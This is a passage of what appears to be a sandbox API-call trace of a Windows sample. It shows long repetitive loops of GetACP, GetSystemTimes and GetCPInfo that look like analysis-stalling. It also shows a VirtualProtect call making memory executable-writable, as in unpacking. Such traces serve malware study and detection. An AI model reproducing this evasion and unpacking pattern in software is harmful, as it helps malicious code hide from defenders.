GetACP () returned 0x4e4 [0130.842] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.842] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.842] GetACP () returned 0x4e4 [0130.842] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.842] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.842] GetACP () returned 0x4e4 [0130.842] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.842] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.842] GetACP () returned 0x4e4 [0130.842] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.842] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.842] GetACP () returned 0x4e4 [0130.842] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.842] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.842] GetACP () returned 0x4e4 [0130.842] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.842] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.842] GetACP () returned 0x4e4 [0130.842] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.842] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.842] GetACP () returned 0x4e4 [0130.842] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.843] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.843] GetACP () returned 0x4e4 [0130.843] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.843] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.843] GetACP () returned 0x4e4 [0130.843] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.843] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.843] GetACP () returned 0x4e4 [0130.843] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.843] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.843] GetACP () returned 0x4e4 [0130.843] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.843] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.843] GetACP () returned 0x4e4 [0130.843] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.843] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.843] GetACP () returned 0x4e4 [0130.971] VirtualProtect (in: lpAddress=0x5e5ac0, dwSize=0xf2eb, flNewProtect=0x40, lpflOldProtect=0x43ad04 | out: lpflOldProtect=0x43ad04*=0x4) returned 1 [0130.971] AddAtomA (lpString=0x0) returned 0x0 [0130.972] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.972] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.972] AddAtomA (lpString=0x0) returned 0x0 [0130.972] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.972] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.972] AddAtomA (lpString=0x0) returned 0x0 [0130.972] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.972] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.972] AddAtomA (lpString=0x0) returned 0x0 [0130.972] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.972] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.972] AddAtomA (lpString=0x0) returned 0x0 [0130.972] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.972] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.972] AddAtomA (lpString=0x0) returned 0x0 [0130.972] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.972] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.972] AddAtomA (lpString=0x0) returned 0x0 [0130.972] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.973] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.973] AddAtomA (lpString=0x0) returned 0x0 [0130.973] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.973] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.973] AddAtomA (lpString=0x0) returned 0x0 [0130.973] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.973] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.973] AddAtomA (lpString=0x0) returned 0x0 [0130.973] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.973] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.973] AddAtomA (lpString=0x0) returned 0x0 [0130.973] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.973] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.973] AddAtomA (lpString=0x0) returned 0x0 [0130.973] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.973] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.973] AddAtomA (lpString=0x0) returned 0x0 [0130.973] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.973] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.973] AddAtomA (lpString=0x0) returned 0x0 [0130.973] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.973] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.973] AddAtomA (lpString=0x0) returned 0x0 [0130.973] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.973] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.974] AddAtomA (lpString=0x0) returned 0x0 [0130.974] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.974] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.974] AddAtomA (lpString=0x0) returned 0x0 [0130.974] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.974] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.974] AddAtomA (lpString=0x0) returned 0x0 [0130.974] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.974] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.974] AddAtomA (lpString=0x0) returned 0x0 [0130.974] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.974] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.974] AddAtomA (lpString=0x0) returned 0x0 [0130.974] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.974] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.974] AddAtomA (lpString=0x0) returned 0x0 [0130.974] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.974] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.974] AddAtomA (lpString=0x0) returned 0x0 [0130.974] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.974] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.974] AddAtomA (lpString=0x0) returned 0x0 [0130.974] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.974] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.974] AddAtomA (lpString=0x0) returned 0x0 [0130.975] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.975] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.975] AddAtomA (lpString=0x0) returned 0x0 [0130.975] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.975] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.975] AddAtomA (lpString=0x0) returned 0x0 [0130.975] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.975] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.975] AddAtomA (lpString=0x0) returned 0x0 [0130.975] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.975] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.975] AddAtomA (lpString=0x0) returned 0x0 [0130.975] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.975] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.975] AddAtomA (lpString=0x0) returned 0x0 [0130.975] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.975] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.975] AddAtomA (lpString=0x0) returned 0x0 [0130.975] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.975] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.975] AddAtomA (lpString=0x0) returned 0x0 [0130.975] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.975] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.975] AddAtomA (lpString=0x0) returned 0x0 [0130.976] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.976] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.976] AddAtomA (lpString=0x0) returned 0x0 [0130.976] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.976] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.976] AddAtomA (lpString=0x0) returned 0x0 [0130.976] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.976] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.976] AddAtomA (lpString=0x0) returned 0x0 [0130.976] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.976] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.976] AddAtomA (lpString=0x0) returned 0x0 [0130.976] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.976] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.976] AddAtomA (lpString=0x0) returned 0x0 [0130.976] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.976] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.976] AddAtomA (lpString=0x0) returned 0x0 [0130.976] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.976] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.976] AddAtomA (lpString=0x0) returned 0x0 [0130.976] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.976] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.976] AddAtomA (lpString=0x0) returned 0x0 [0130.977] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.977] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.977] AddAtomA (lpString=0x0) returned 0x0 [0130.977] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.977] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.977] AddAtomA (lpString=0x0) returned 0x0 [0130.977] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.977] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.977] AddAtomA (lpString=0x0) returned 0x0 [0130.977] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.977] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.977] AddAtomA (lpString=0x0) returned 0x0 [0130.977] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.977] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.977] AddAtomA (lpString=0x0) returned 0x0 [0130.977] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.977] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.977] AddAtomA (lpString=0x0) returned 0x0 [0130.977] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.977] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.977] AddAtomA (lpString=0x0) returned 0x0 [0130.977] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.977] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.977] AddAtomA (lpString=0x0) returned 0x0 [0130.978] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.978] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.978] AddAtomA (lpString=0x0) returned 0x0 [0130.978] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.978] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.978] AddAtomA (lpString=0x0) returned 0x0 [0130.978] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.978] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.978] AddAtomA (lpString=0x0) returned 0x0 [0130.978] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.978] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.978] AddAtomA (lpString=0x0) returned 0x0 [0130.978] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.978] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.978] AddAtomA (lpString=0x0) returned 0x0 [0130.978] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.978] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.978] AddAtomA (lpString=0x0) returned 0x0 [0130.978] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.978] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.978] AddAtomA (lpString=0x0) returned 0x0 [0130.978] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.978] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.978] AddAtomA (lpString=0x0) returned 0x0 [0130.978] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.979] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.979] AddAtomA (lpString=0x0) returned 0x0 [0130.979] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.979] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.979] AddAtomA (lpString=0x0) returned 0x0 [0130.979] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.979] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.979] AddAtomA (lpString=0x0) returned 0x0 [0130.979] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.979] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.979] AddAtomA (lpString=0x0) returned 0x0 [0130.979] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.979] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.979] AddAtomA (lpString=0x0) returned 0x0 [0130.979] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.979] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.979] AddAtomA (lpString=0x0) returned 0x0 [0130.979] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.979] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.979] AddAtomA (lpString=0x0) returned 0x0 [0130.979] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.979] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.979] AddAtomA (lpString=0x0) returned 0x0 [0130.979] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.979] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.979] AddAtomA (lpString=0x0) returned 0x0 [0130.980] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.980] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.980] AddAtomA (lpString=0x0) returned 0x0 [0130.980] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.980] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.980] AddAtomA (lpString=0x0) returned 0x0 [0130.980] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.980] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.980] AddAtomA (lpString=0x0) returned 0x0 [0130.980] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.980] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.980] AddAtomA (lpString=0x0) returned 0x0 [0130.980] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.980] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.980] AddAtomA (lpString=0x0) returned 0x0 [0130.980] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.980] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.980] AddAtomA (lpString=0x0) returned 0x0 [0130.980] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.980] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.980] AddAtomA (lpString=0x0) returned 0x0 [0130.981] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.981] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.981] AddAtomA (lpString=0x0) returned 0x0 [0130.981] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.981] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.981] AddAtomA (lpString=0x0) returned 0x0 [0130.981] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.981] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.981] AddAtomA (lpString=0x0) returned 0x0 [0130.981] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.981] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.981] AddAtomA (lpString=0x0) returned 0x0 [0130.981] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.981] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.981] AddAtomA (lpString=0x0) returned 0x0 [0130.981] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.981] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.981] AddAtomA (lpString=0x0) returned 0x0 [0130.981] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.981] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.981] AddAtomA (lpString=0x0) returned 0x0 [0130.981] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.981] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.981] AddAtomA (lpString=0x0) returned 0x0 [0130.981] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.981] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.981] AddAtomA (lpString=0x0) returned 0x0 [0130.981] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.981] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.981] AddAtomA (lpString=0x0) returned 0x0 [0130.981] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.982] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.982] AddAtomA (lpString=0x0) returned 0x0 [0130.982] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.982] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.982] AddAtomA (lpString=0x0) returned 0x0 [0130.982] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.982] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.982] AddAtomA (lpString=0x0) returned 0x0 [0130.982] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.982] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.982] AddAtomA (lpString=0x0) returned 0x0 [0130.982] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.982] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.982] AddAtomA (lpString=0x0) returned 0x0 [0130.982] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.982] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.982] AddAtomA (lpString=0x0) returned 0x0 [0130.982] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.982] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.982] AddAtomA (lpString=0x0) returned 0x0 [0130.982] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.982] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.982] AddAtomA (lpString=0x0) returned 0x0 [0130.982] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.982] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.982] AddAtomA (lpString=0x0) returned 0x0 [0130.982] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.982] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.982] AddAtomA (lpString=0x0) returned 0x0 [0130.983] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.983] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.983] 